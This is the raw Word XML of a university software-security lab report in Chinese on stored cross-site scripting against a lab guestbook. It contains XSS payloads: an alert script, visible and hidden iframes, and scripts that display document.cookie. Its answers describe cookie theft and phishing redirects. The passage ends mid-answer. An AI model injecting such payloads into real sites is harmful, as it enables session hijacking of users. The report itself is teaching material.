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0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25F8368D" wp14:editId="3E5194B7">
            <wp:extent cx="3810000" cy="3009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E0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文中宋"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="5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哈尔滨工业大学</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRDefault="00FA7206" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文中宋" w:hint="eastAsia"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>软件安全</w:t>
      </w:r>
      <w:r w:rsidR="00682E0B">
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文中宋" w:hint="eastAsia"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>课程</w:t>
      </w:r>
      <w:r w:rsidR="00682E0B">
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRPr="00A77A1B" w:rsidRDefault="00FA7206" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:cs="Lohit Hindi"/>
          <w:kern w:val="3"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="72"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:cs="Lohit Hindi" w:hint="eastAsia"/>
          <w:kern w:val="3"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="72"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>实验一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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学院：计算机学院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班级：</w:t>
      </w:r>
      <w:r w:rsidR="00724331">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1403202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学号：</w:t>
      </w:r>
      <w:r w:rsidR="00724331">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1140320206</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00682E0B" w:rsidRDefault="00682E0B" w:rsidP="00682E0B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:left="2520" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>姓名：</w:t>
      </w:r>
      <w:r w:rsidR="00724331">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>霍峻杰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E"/>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E"/>
    <w:p w:rsidR="00682E0B" w:rsidRPr="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t>1-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：跨站脚本攻击</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152D02" w:rsidRDefault="00682E0B" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152D02" w:rsidRPr="00A3544E" w:rsidRDefault="00152D02" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="375" w:lineRule="atLeast"/>
        <w:ind w:left="210" w:right="540" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
        <w:t>1）深入理解跨站脚本攻击概念；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152D02" w:rsidRPr="00A3544E" w:rsidRDefault="00152D02" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="375" w:lineRule="atLeast"/>
        <w:ind w:left="630" w:right="540"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
        <w:t>2）掌握形成跨站脚本漏洞的条件；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152D02" w:rsidRPr="00A3544E" w:rsidRDefault="00152D02" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="375" w:lineRule="atLeast"/>
        <w:ind w:left="630" w:right="540"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="Arial"/>
        </w:rPr>
        <w:t>3）掌握对跨站脚本的几种利用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00152D02" w:rsidRPr="00902E02" w:rsidRDefault="00152D02" w:rsidP="00152D02">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:before="312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t>实验内容及实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00902E02" w:rsidRDefault="008F0C51" w:rsidP="00A94E90">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0C51">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务一：存储式跨站脚本测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0C51" w:rsidRDefault="008F0C51" w:rsidP="00A94E90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实验内容：初步测试留言系统是否存在存储式跨站漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F0C51" w:rsidRDefault="008F0C51" w:rsidP="00A94E90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A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/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1.登录到实验机上，打开留言系统（10.1.1.2）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>留言内容中填写包含有跨站测试的脚本，提交后观察返回效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:ind w:left="210" w:firstLineChars="175" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3544E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert("XSS TEST")&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00A3544E" w:rsidP="00A3544E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:ind w:left="210" w:firstLineChars="175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如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3544E" w:rsidRDefault="00516E0E" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312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7F3F548C" wp14:editId="482376B4">
            <wp:extent cx="2257425" cy="9455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604" t="59026" r="25595"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2257425" cy="9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193" w:rsidRDefault="008F7193" w:rsidP="008F7193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  <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新留言系统</w:t>
      </w:r>
      <w:r w:rsidRPr="008F7193">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>，如果新加留言显示如下，则说明系统有存储式跨站漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00066231" w:rsidRDefault="00066231" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0399" w:rsidRDefault="002E0399" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="00516E0E" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77993D91" wp14:editId="7D3E07EE">
            <wp:extent cx="3333750" cy="1206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52" t="49468" r="14941"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="33337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193" w:rsidRDefault="008F7193" w:rsidP="008F7193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  <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思考：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="008F7193" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="42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测试当其他用户打开这个页面时，嵌入的代码是否会执行？分析留言系统代码，为什么填写的留言脚本会被执行？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="008F7193" w:rsidP="008F7193">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind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答：其他用户打开这个页面，嵌入的代码也会执行。系统把留言系统内容并没有当成数据，而是当成了javascript代码，所以填写的留言脚本会被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="008F7193" w:rsidP="00A94E90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任务二：存储式跨站漏洞的简单利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="008F7193" w:rsidP="00A94E90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实验内容：使用跨站漏洞加载恶意网页。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F7193" w:rsidRDefault="008F7193" w:rsidP="00A94E90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A94E90">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94E90" w:rsidRDefault="00A94E90" w:rsidP="00A94E90">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312" w:line="360" w:lineRule="auto"/>
        <w:ind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清空实验一任务，将恶意网页（假设http://www.hit.edu.cn）放入留言系统数据库，并在用户端执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516E0E" w:rsidRDefault="00A94E90" w:rsidP="00A94E90">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:ind w:left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1.增加一留言，并在留言内容中改为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94E90" w:rsidRDefault="00A94E90" w:rsidP="00A94E90">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A94E90">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00A94E90">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>iframe src=</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00A94E90">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          </w:rPr>
          <w:t>http://www.hit.edu.cn</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A94E90">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&gt;&lt;/iframe&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00516E0E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，测试返回结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516E0E" w:rsidRDefault="00516E0E" w:rsidP="00516E0E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00066231" w:rsidRDefault="00066231" w:rsidP="00516E0E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E0399" w:rsidRDefault="002E0399" w:rsidP="00516E0E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00516E0E" w:rsidRDefault="00516E0E" w:rsidP="00516E0E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C944AA3" wp14:editId="52B20DEC">
            <wp:extent cx="3638550" cy="120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69" t="33075" r="15844" b="26921"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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E0E" w:rsidRDefault="00516E0E" w:rsidP="00516E0E">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:beforeLines="100" w:before="312"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:tab/>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏恶意网页。增加留言，内容包含以下语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0399" w:rsidRPr="002E0399" w:rsidRDefault="00516E0E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Pr="00516E0E">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&lt;iframe src=http://today.hit.edu.cn width="0" height="0"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，观察返回状态，并解释原因。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516E0E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57FA749C" wp14:editId="626C4066">
            <wp:extent cx="3267075" cy="113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324" t="43993" r="18734" b="22448"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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746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</w:r>
      <w:r w:rsidR="00066231">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>原因是，将iframe的高度和宽度都设置为0，达到简单的“掩人耳目”的效果，</w:t>
      </w:r>
      <w:r w:rsidR="002E0399">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>其实就是通过对html dom的解释，将iframe框架隐藏，也是比较基础的方法，当然查看网页源代码就会直接发现，一些检测软件也会轻松的将这个漏洞利用找出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6746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  <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思考本留言系统是否有其他利用方式？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6746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2E0399">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="002E0399">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ss漏洞最多的用的还是盗取用户cookie，如果盗取了管理员的cookie将会造成不可预知的后果。但是还可以进行钓鱼网站的跳转，一些不细心的用户会不检查域名的改变或者网页跳转，而被钓鱼。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6746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任务三：利用存储式跨站漏洞窃取用户cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6746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实验内容：利用存储式跨站漏洞窃取用户cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B6746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实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0399" w:rsidRPr="002E0399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  <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续添加留言，包含以下内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="000B6746">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003351F6" w:rsidRDefault="003351F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7CB3AE41" wp14:editId="158C72BE">
            <wp:extent cx="2428875" cy="279400"/>
            <wp:effectExtent l="0" t="0" r="952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574" t="77665" r="31375"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2428875" cy="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399" w:rsidRPr="002E0399" w:rsidRDefault="000B674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  <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="003351F6">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续添加留言，包含以下内容：</w:t>
      </w:r>
      <w:r w:rsidR="003351F6" w:rsidRPr="003351F6">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="003351F6">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比较有什么区别？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003351F6" w:rsidRDefault="003351F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6B55CBAB" wp14:editId="470753D1">
            <wp:extent cx="2609850" cy="10839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005" t="51739" r="24512"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2609850" cy="108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1F6" w:rsidRDefault="003351F6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区别是</w:t>
      </w:r>
      <w:r w:rsidR="00A449D8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第一个作为网页的内容给出，可以通过一些简单的隐藏来隐藏自己，而第二种是以弹窗的形式给出，说实话，一般弹窗是用来测试一个网站是否有xss漏洞，而一般xss利用时不会使用弹窗形式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005456BC" w:rsidRPr="005456BC" w:rsidRDefault="005E2E7A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  <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用管理员登陆，观察显示的cookie有什么不同？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E2E7A" w:rsidRDefault="005E2E7A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3A0432E3" wp14:editId="619EC82F">
            <wp:extent cx="3009900" cy="440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52" t="73479" r="21081"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3009900" cy="44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E7A" w:rsidRDefault="005E2E7A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答：</w:t>
      </w:r>
      <w:r w:rsidR="00A449D8">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cookie肯定不一样，不同登录用户</w:t>
      </w:r>
      <w:r w:rsidR="00D92ED9">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同时间点的登陆cookie都是不一样的，何况第二个是admin的cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E2E7A" w:rsidRDefault="005E2E7A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  <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思考：这种窃取cookie的方式有什么缺点？有什么方法可以将用户的cookie窃取出并保存下来，而且用户看不到？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E2E7A" w:rsidRDefault="005E2E7A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FD4C7B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D92ED9">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，登陆用户才会xss触发</w:t>
      </w:r>
      <w:r w:rsidR="00FD4C7B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
